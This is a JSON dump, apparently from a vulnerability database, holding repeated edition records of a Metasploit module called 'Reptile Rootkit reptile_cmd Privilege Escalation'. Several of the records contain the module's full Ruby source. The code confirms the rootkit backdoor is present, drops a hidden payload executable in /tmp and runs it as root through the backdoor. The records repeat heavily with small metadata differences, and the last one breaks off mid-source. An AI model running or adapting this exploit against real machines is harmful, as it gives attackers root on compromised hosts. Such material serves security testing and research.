"metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-24T17:46:36", "differentElements": ["sourceData"], "edition": 110}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-25T09:40:44", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:AC0C28A61401A117D2DE59B91D235367"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157384", "PACKETSTORM:157383", "PACKETSTORM:157382"]}, {"type": "exploitdb", "idList": ["EDB-ID:48378", "EDB-ID:48380"]}, {"type": "virtuozzo", "idList": ["VZA-2020-031"]}, {"type": "amazon", "idList": ["ALAS-2020-1358", "ALAS-2020-1361", "ALAS-2020-1359", "ALAS-2020-1362", "ALAS-2020-1360"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0543-1", "OPENSUSE-SU-2020:0545-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mscve", "idList": ["MS:ADV200004"]}, {"type": "mskb", "idList": ["KB3062157", "KB3185331"]}], "modified": "2020-04-25T09:40:44", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2020-04-25T09:40:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-25T09:40:44", "differentElements": ["sourceData"], "edition": 111}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-25T17:29:24", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:AC0C28A61401A117D2DE59B91D235367"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157384", "PACKETSTORM:157383", "PACKETSTORM:157382"]}, {"type": "exploitdb", "idList": ["EDB-ID:48378", "EDB-ID:48380"]}, {"type": "virtuozzo", "idList": ["VZA-2020-031"]}, {"type": "amazon", "idList": ["ALAS-2020-1358", "ALAS-2020-1361", "ALAS-2020-1359", "ALAS-2020-1362", "ALAS-2020-1360"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0543-1", "OPENSUSE-SU-2020:0545-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mscve", "idList": ["MS:ADV200004"]}, {"type": "mskb", "idList": ["KB3062157", "KB3185331"]}], "modified": "2020-04-25T09:40:44", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2020-04-25T09:40:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-25T17:29:24", "differentElements": ["modified", "published"], "edition": 112}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-26T13:55:10", "history": [], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:AC0C28A61401A117D2DE59B91D235367"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157384", "PACKETSTORM:157383", "PACKETSTORM:157382"]}, {"type": "exploitdb", "idList": ["EDB-ID:48378", "EDB-ID:48380"]}, {"type": "virtuozzo", "idList": ["VZA-2020-031"]}, {"type": "amazon", "idList": ["ALAS-2020-1358", "ALAS-2020-1361", "ALAS-2020-1359", "ALAS-2020-1362", "ALAS-2020-1360"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0543-1", "OPENSUSE-SU-2020:0545-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mscve", "idList": ["MS:ADV200004"]}, {"type": "mskb", "idList": ["KB3062157", "KB3185331"]}], "modified": "2020-04-25T09:40:44", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2020-04-25T09:40:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-26T13:55:10", "differentElements": ["modified", "published"], "edition": 113}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-26T17:26:11", "history": [], "viewCount": 54, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:AC0C28A61401A117D2DE59B91D235367"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157384", "PACKETSTORM:157383", "PACKETSTORM:157382"]}, {"type": "exploitdb", "idList": ["EDB-ID:48378", "EDB-ID:48380"]}, {"type": "virtuozzo", "idList": ["VZA-2020-031"]}, {"type": "amazon", "idList": ["ALAS-2020-1358", "ALAS-2020-1361", "ALAS-2020-1359", "ALAS-2020-1362", "ALAS-2020-1360"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0543-1", "OPENSUSE-SU-2020:0545-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mscve", "idList": ["MS:ADV200004"]}, {"type": "mskb", "idList": ["KB3062157", "KB3185331"]}], "modified": "2020-04-25T09:40:44", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2020-04-25T09:40:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-26T17:26:11", "differentElements": ["sourceData"], "edition": 114}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-27T15:40:45", "history": [], "viewCount": 54, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:AC0C28A61401A117D2DE59B91D235367"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157384", "PACKETSTORM:157383", "PACKETSTORM:157382"]}, {"type": "exploitdb", "idList": ["EDB-ID:48378", "EDB-ID:48380"]}, {"type": "virtuozzo", "idList": ["VZA-2020-031"]}, {"type": "amazon", "idList": ["ALAS-2020-1358", "ALAS-2020-1361", "ALAS-2020-1359", "ALAS-2020-1362", "ALAS-2020-1360"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0543-1", "OPENSUSE-SU-2020:0545-1"]}, {"type": "threatpost", "idList": ["THREATPOST:1AD5D2A16F23798B7191375E4C3E9F1B"]}, {"type": "kitploit", "idList": ["KITPLOIT:8285766177759936382"]}, {"type": "mscve", "idList": ["MS:ADV200004"]}, {"type": "mskb", "idList": ["KB3062157", "KB3185331"]}], "modified": "2020-04-25T09:40:44", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2020-04-25T09:40:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-27T15:40:45", "differentElements": ["sourceData"], "edition": 115}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-27T17:42:13", "history": [], "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:58F0CFFE45A637210BEDCC774CAE1E7E"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B4BEA62BD49BC9137C158CCAB7A0DE59"]}, {"type": "redhat", "idList": ["RHSA-2020:1966"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0562-1"]}, {"type": "cve", "idList": ["CVE-2020-8486", "CVE-2020-12447", "CVE-2019-19102", "CVE-2020-8487", "CVE-2020-8478", "CVE-2020-8489", "CVE-2020-8484", "CVE-2020-8488", "CVE-2020-8485"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-2_0-0234_SQLITE.NASL", "PHOTONOS_PHSA-2020-3_0-0083_UNZIP.NASL", "DEBIAN_DLA-2190.NASL", "PHOTONOS_PHSA-2020-1_0-0290_ENVOY.NASL", "PHOTONOS_PHSA-2020-1_0-0290_SYSTEMD.NASL", "DEBIAN_DLA-2193.NASL"]}], "modified": "2020-04-27T17:42:13", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-04-27T17:42:13", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-27T17:42:13", "differentElements": ["modified", "published"], "edition": 116}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-30T13:15:34", "history": [], "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:1984"]}, {"type": "kitploit", "idList": ["KITPLOIT:2661436361971910555"]}, {"type": "securelist", "idList": ["SECURELIST:2BFE50E9CC5C4341FF0F41C2EA64E9CA"]}, {"type": "mskb", "idList": ["KB317244"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877759", "OPENVAS:1361412562310877729", "OPENVAS:1361412562310877721", "OPENVAS:1361412562310877746", "OPENVAS:1361412562310877720", "OPENVAS:1361412562310877728", "OPENVAS:1361412562310877762", "OPENVAS:1361412562310877756", "OPENVAS:1361412562310877734", "OPENVAS:1361412562310877749"]}], "modified": "2020-04-30T13:15:34", "rev": 2}, "score": {"value": 1.0, "vector": "NONE", "modified": "2020-04-30T13:15:34", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 